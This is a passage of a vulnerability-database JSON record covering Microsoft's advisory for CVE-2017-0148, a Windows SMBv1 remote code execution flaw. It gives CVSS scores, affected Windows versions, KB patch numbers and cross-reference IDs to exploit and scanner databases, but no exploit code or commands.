"https://blog.qualys.com/category/product-tech", "reporter": "Anand Paturi", "references": [], "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "immutableFields": [], "lastseen": "2021-10-05T14:50:49", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:BD645B28-C99E-42EA-A606-832F4F534945"]}, {"type": "cve", "idList": ["CVE-2013-2551", "CVE-2021-26855", "CVE-2021-30116", "CVE-2017-0144", "CVE-2016-1019", "CVE-2017-0143", "CVE-2021-27065", "CVE-2015-8651", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-34527"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472", "UB:CVE-2016-1019", "UB:CVE-2015-8651"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYLOGON_RCE/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2021-27065/", "MSF:AUXILIARY/SCANNER/HTTP/EXCHANGE_PROXYLOGON/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2021-34527/"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4"]}, {"type": "msrc", "idList": ["MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:239E65C8BEB88185329D9990C80B10DF"]}, {"type": "symantec", "idList": 
["SMNTC-96703", "SMNTC-58570", "SMNTC-96705", "SMNTC-96704", "SMNTC-79705"]}, {"type": "hackerone", "idList": ["H1:1119228", "H1:1119224"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL"]}, {"type": "cisa", "idList": ["CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:2B970469D89016F563E142BE209443D8", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:60700"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A"]}, {"type": "mssecure", "idList": ["MSSECURE:2FB5327A309898BD59A467446C9C36DC"]}, {"type": "exploitdb", "idList": ["EDB-ID:49895", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:49637", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162736", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:161938"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-36024", "1337DAY-ID-35944", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-36281"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "hivepro", "idList": ["HIVEPRO:8DA601C83DB9C139357327C06B06CB36"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "fireeye", "idList": ["FIREEYE:1A61A821CE69D378830204326B2E938C"]}, {"type": "pentestpartners", "idList": 
["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}], "modified": "2021-10-05T14:50:49", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-10-05T14:50:49", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-10-05T14:50:49", "differentElements": ["description"], "edition": 1}], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-0948", "CPAI-2021-0099", "CPAI-2015-1429", "CPAI-2014-0372", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2017-0177", "CPAI-2021-0465", "CPAI-2014-0371", "CPAI-2016-0264"]}, {"type": "githubexploit", "idList": ["7078ED42-959E-5242-BE9D-17F2F99C76A8", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "07DF268C-467E-54A3-B713-057BA19C72F7", "3F400483-1F7E-5BE5-8612-4D55D450D553", "63C36F7A-5F99-5A79-B99F-260360AC237F", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "0CFAB531-412C-57A0-BD9E-EF072620C078", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "D089579B-4420-5AD5-999F-45063D972E66", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "0BB19334-D311-5464-B40B-7B27A0AD8825", "28D42B84-AB24-5FC6-ADE1-610374D67F21", 
"A24AC1AC-55EF-51D8-B696-32F369DCAB96", "7758268F-2004-536A-B51F-62DA1E5A992D", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "0263BC36-BEB1-519B-965B-52D9E6AB116F", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "256984DC-A742-53F8-889F-2071EC134734", "20466D13-6C5B-5326-9C8B-160E9BE37195", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F5339382-9321-5B96-934D-B803353CC9E3", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "939F3BE7-AF69-5351-BD56-12412FA184C5", "E235B3DF-990F-5508-9496-90462B45125D", "3019C843-FE2F-527C-B7C1-14A1C3066721", "FC661572-B96B-5B2C-B12F-E8D279E189BF", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "7275794A-F2F6-51E6-B514-185E494D8A3F"]}, {"type": "attackerkb", "idList": ["AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:BD645B28-C99E-42EA-A606-832F4F534945"]}, {"type": "cve", "idList": ["CVE-2015-8651", "CVE-2017-0144", "CVE-2017-0143", "CVE-2021-34527", "CVE-2017-0145", "CVE-2021-30116", "CVE-2013-2551", "CVE-2021-26855", "CVE-2016-1019", "CVE-2021-27065", "CVE-2020-1472"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-8651", "UB:CVE-2016-1019", "UB:CVE-2020-1472"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-27065/", "MSF:ILITIES/MSFT-CVE-2021-34527/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", 
"QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F"]}, {"type": "msrc", "idList": ["MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:239E65C8BEB88185329D9990C80B10DF"]}, {"type": "symantec", "idList": ["SMNTC-79705", "SMNTC-58570", "SMNTC-96703"]}, {"type": "hackerone", "idList": ["H1:1119228", "H1:1119224"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL"]}, {"type": "cisa", "idList": ["CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:433F588AAEF2DF2A0B46FE60687F19E0"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45A121567763FF457DE6E50439C2605A"]}], "modified": "2021-10-05T16:35:26", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-10-05T16:35:26", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"]}], "mscve": [{"id": "MS:CVE-2017-0148", "hash": "7d21d22f517defccc35d772d05d77d29", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T10:49:13", "history": [{"bulletin": {"id": "MS:CVE-2017-0148", "hash": "b1640362be726f1270f402ea7ef6a86c66aa5eae57b350fd9b739f1b6c5ad735", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 1.0 (SMBv1) 
server handles certain requests. An attacker\nwho successfully exploited the vulnerability could gain the ability to execute\ncode on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker\ncould send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1\nhandles these specially crafted requests.\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2019-08-09T00:43:59", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"modified": "2019-08-09T00:43:59", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": 
["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-08-09T00:43:59", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 
Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": 
"Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2019-08-09T00:43:59", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "8c4669cac4f8668129bde1efde0f0096", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2020-08-07T11:45:29", "history": [], "viewCount": 80, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", 
"PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-08-07T11:45:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-08-07T11:45:29", "rev": 2}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": 
"KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core 
installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2020-08-07T11:45:29", "differentElements": ["href", "kbList", "msAffectedSoftware"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "dde6aece2d6fc96ddca1cf6b2ba5069a", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-03-18T19:17:49", "history": [], "viewCount": 103, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": 